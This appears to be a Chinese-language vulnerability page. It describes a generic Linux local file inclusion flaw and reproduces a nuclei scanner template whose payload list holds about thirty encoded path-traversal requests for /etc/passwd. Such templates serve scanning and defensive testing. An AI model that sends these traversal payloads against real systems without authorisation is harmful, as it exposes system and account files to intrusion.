Generic Linux Local File Inclusion Vulnerability

漏洞信息

漏洞名称: Generic Linux Local File Inclusion Vulnerability

漏洞类型: 文件读取

漏洞等级: 高危

漏洞描述: 该漏洞涉及Generic Linux系统中的本地文件包含(Local File Inclusion, LFI)问题,允许攻击者通过构造特定的HTTP请求路径,读取服务器上的敏感文件,如/etc/passwd。这种漏洞通常由于应用程序未对用户输入进行严格的验证和过滤,导致攻击者可以通过路径遍历技术访问系统上的任意文件。

受影响产品: Generic Linux是一个泛指,可能涉及多种基于Linux的操作系统和应用程序。这类系统广泛应用于服务器、网络设备和个人电脑中,因其开源和高度可定制的特性而受到广泛欢迎。

漏洞解释: 本地文件包含漏洞属于文件读取类型,其技术根源在于应用程序在处理用户提供的文件路径时,未能正确限制访问范围,使得攻击者可以通过特殊的路径构造(如使用../或编码字符)绕过限制,访问系统上的任意文件。此漏洞的CVSS评分为7.5,属于高危漏洞。

影响分析: 利用此漏洞,攻击者可以读取服务器上的敏感信息,如用户账户列表、配置文件等,可能导致信息泄露、权限提升等安全问题。由于漏洞利用不需要认证,且可以通过自动化工具进行大规模扫描和利用,因此对受影响系统的安全构成严重威胁。

产品名称: Generic Linux

来源: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fvulnerabilities%2Fgeneric%2Fgeneric-linux-lfi.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64

id: generic-linux-lfi

info:
  name: Generic Linux - Local File Inclusion
  author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley,DhiyaneshDK
  severity: high
  description: Generic Linux is subject to Local File Inclusion - the vulnerability was identified by requesting /etc/passwd from the server.
  reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 32
  tags: linux,lfi,generic

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - "/etc/passwd"
        - "/..%5cetc/passwd"
        - "/..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5cetc/passwd"
        - "/static/..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/./../../../../../../../../../../etc/passwd"
        - "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
        - "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
        - "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
        - "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
        - "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
        - "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
        - "/..///////..////..//////etc/passwd"
        - "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"
        - "/index.php?page=etc/passwd"
        - "/index.php?page=etc/passwd%00"
        - "/index.php?page=../../etc/passwd"
        - "/index.php?page=....//....//etc/passwd"
        - "/../../../../../../../../../etc/passwd"

    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
# digest: 4a0a00473045022100b6555f84bb9c3de9fdfcb8005142f2a60aee6fb80f447d35eb42fb3adf8e95f1022031a89371251047fb99bf52f5188b22b070cb68b5591852589aba71f1b334427d:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #文件读取
Generic Linux Local File Inclusion Vulnerability
http://example.com/2025/07/21/github_615862643/
作者
lianccc
发布于
2025年7月21日
许可协议